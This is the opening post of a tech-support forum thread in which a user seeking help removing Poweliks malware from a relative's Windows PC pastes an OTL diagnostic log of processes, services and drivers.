Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Poweliks and maybe something else nasty! [Solved]


  • This topic is locked This topic is locked

#1
allforhimblog

allforhimblog

    Member

  • Member
  • PipPip
  • 98 posts

Okie ladies and gentleman, I'm  working on my grandma's computer. I'm not sure what she's been doing, but she has caught a nasty bug and I need help removing them.  I feel like I'm pretty tech savy and have used Malwarebytes, RogueKiller, and Avast but this poweliks malware...it has me whipped! Just when I think I've gotten rid of it, it shows back up and up and up and up and etc.  I continue to receive Powershell errors and internet explorer will not let me download or install anything and this thing is running sllllllooooooowwwwww. I loaded Avast on a jump drive and installed it to this computer and that downloaded Chrome so thankfully I have a browser that will allow me to download anything needed. I was told to check this place out and look for help.  I so appreciate your time and effort and look forward to taking this thing out!

 

Attached is my OTL log

 

OTL logfile created on: 2/21/2015 6:42:45 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Dorothy01\Downloads
64bit- An unknown product  (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17207)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.57 Gb Total Physical Memory | 2.44 Gb Available Physical Memory | 68.20% Memory free
3.96 Gb Paging File | 2.83 Gb Available in Paging File | 71.46% Paging File free
Paging file location(s): c:\pagefile.sys 400 4096 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 444.06 Gb Total Space | 382.38 Gb Free Space | 86.11% Space Free | Partition Type: NTFS
Drive D: | 19.78 Gb Total Space | 2.47 Gb Free Space | 12.50% Space Free | Partition Type: NTFS
Drive F: | 7.44 Gb Total Space | 6.38 Gb Free Space | 85.71% Space Free | Partition Type: FAT32
 
Computer Name: DOROTHY | User Name: Dorothy01 | Logged in as Administrator.
Boot Mode: SafeMode with Networking | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2015/02/21 18:42:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Dorothy01\Downloads\OTL.exe
PRC - [2015/02/17 16:45:00 | 000,843,592 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2015/02/17 16:44:57 | 009,171,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\pdf.dll
MOD - [2015/02/17 16:44:53 | 001,117,512 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\libglesv2.dll
MOD - [2015/02/17 16:44:51 | 000,211,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\40.0.2214.115\libegl.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2015/02/19 21:17:42 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Stopped] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:64bit: - [2014/10/14 10:26:59 | 000,076,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV:64bit: - [2014/09/24 02:38:43 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/09/24 02:16:43 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2014/09/24 02:16:43 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2014/09/24 02:03:47 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2014/09/24 02:03:47 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2014/09/24 01:50:29 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2014/09/24 01:50:27 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2014/09/24 01:33:15 | 001,600,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2014/09/24 01:32:55 | 002,898,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2014/09/24 01:24:03 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2014/09/24 01:24:02 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2014/09/24 01:23:54 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2014/09/24 01:23:52 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2014/09/24 01:23:51 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2014/09/24 01:23:47 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2014/09/24 01:23:47 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2014/09/24 01:23:45 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2014/07/21 23:04:24 | 000,239,616 | ---- | M] (AMD) [Auto | Stopped] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV:64bit: - [2014/07/04 22:33:34 | 000,344,064 | ---- | M] (Advanced Micro Devices, Inc.) [Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service)
SRV:64bit: - [2013/08/22 05:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 05:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 05:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 05:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 05:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 04:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 04:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 04:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 03:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 03:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 03:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 03:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 03:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 03:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 03:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 03:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2009/11/17 20:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Stopped] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/10/14 10:27:02 | 000,475,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll -- (WAS)
SRV - [2014/10/14 10:26:58 | 000,066,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV - [2014/10/14 10:26:56 | 000,062,464 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll -- (AppHostSvc)
SRV - [2014/09/24 02:16:42 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/09/24 01:32:55 | 002,898,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2013/08/21 21:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/21 20:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/05/20 22:44:22 | 000,144,368 | R--- | M] (Symantec Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccSvcHst.exe -- (NIS)
SRV - [2012/08/15 14:29:52 | 000,085,504 | ---- | M] (Hewlett-Packard Company) [Auto | Stopped] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2012/07/19 19:06:58 | 000,035,232 | ---- | M] (Hewlett-Packard) [Auto | Stopped] -- c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe -- (HPConnectedRemote)
SRV - [2012/07/13 19:02:16 | 002,451,456 | ---- | M] (Realsil Microelectronics Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe -- (IconMan_R)
SRV - [2010/10/12 11:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2015/02/20 19:18:37 | 000,037,624 | ---- | M] () [Kernel | On_Demand | Unknown] -- C:\Windows\SysNative\drivers\TrueSight.sys -- (TrueSight)
DRV:64bit: - [2015/02/19 21:49:23 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:64bit: - [2015/02/19 21:27:38 | 001,050,432 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)
DRV:64bit: - [2015/02/19 21:27:14 | 000,083,280 | ---- | M] (AVAST Software) [File_System | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswmonflt.sys -- (aswMonFlt)
DRV:64bit: - [2015/02/19 21:17:47 | 000,436,624 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\Windows\SysNative\drivers\aswSP.sys -- (aswSP)
DRV:64bit: - [2015/02/19 21:17:47 | 000,267,632 | ---- | M] () [Kernel | Boot | Stopped] -- C:\WINDOWS\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2015/02/19 21:17:47 | 000,065,776 | ---- | M] () [Kernel | Boot | Stopped] -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2015/02/19 21:17:47 | 000,029,208 | ---- | M] () [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV:64bit: - [2014/09/24 02:46:53 | 000,055,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2014/09/24 02:03:47 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2014/09/24 02:03:47 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2014/09/24 02:03:47 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2014/09/24 01:50:37 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:64bit: - [2014/09/24 01:50:30 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2014/09/24 01:50:28 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/09/24 01:33:00 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2014/09/24 01:32:59 | 000,149,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2014/09/24 01:32:54 | 000,468,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2014/09/24 01:32:54 | 000,412,992 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2014/09/24 01:23:53 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2014/09/24 01:23:48 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2014/09/24 01:23:32 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2014/09/24 01:23:31 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2014/09/24 01:23:31 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2014/09/24 01:23:31 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:64bit: - [2014/09/24 01:23:31 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2014/09/24 01:23:31 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2014/09/24 01:23:30 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2014/09/24 01:23:30 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2014/09/24 01:23:30 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2014/09/24 00:53:14 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2014/09/24 00:53:09 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2014/07/23 13:20:33 | 000,177,312 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS -- (SymEvent)
DRV:64bit: - [2014/07/21 23:04:28 | 013,209,088 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:64bit: - [2014/07/21 23:04:28 | 000,626,688 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:64bit: - [2013/12/04 12:02:30 | 002,505,904 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\netr28x.sys -- (netr28x)
DRV:64bit: - [2013/08/22 07:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 07:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 06:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 06:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:64bit: - [2013/08/22 06:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 06:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:64bit: - [2013/08/22 06:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 06:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 06:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 06:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 06:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 06:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 06:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 06:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 06:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 06:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 06:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 06:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 06:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 06:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 06:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 06:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 06:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 06:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 06:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 06:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 06:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 06:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 06:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 05:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 05:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 05:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 05:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 05:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 05:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 05:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 05:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 05:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 05:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 05:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 05:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 05:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 05:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
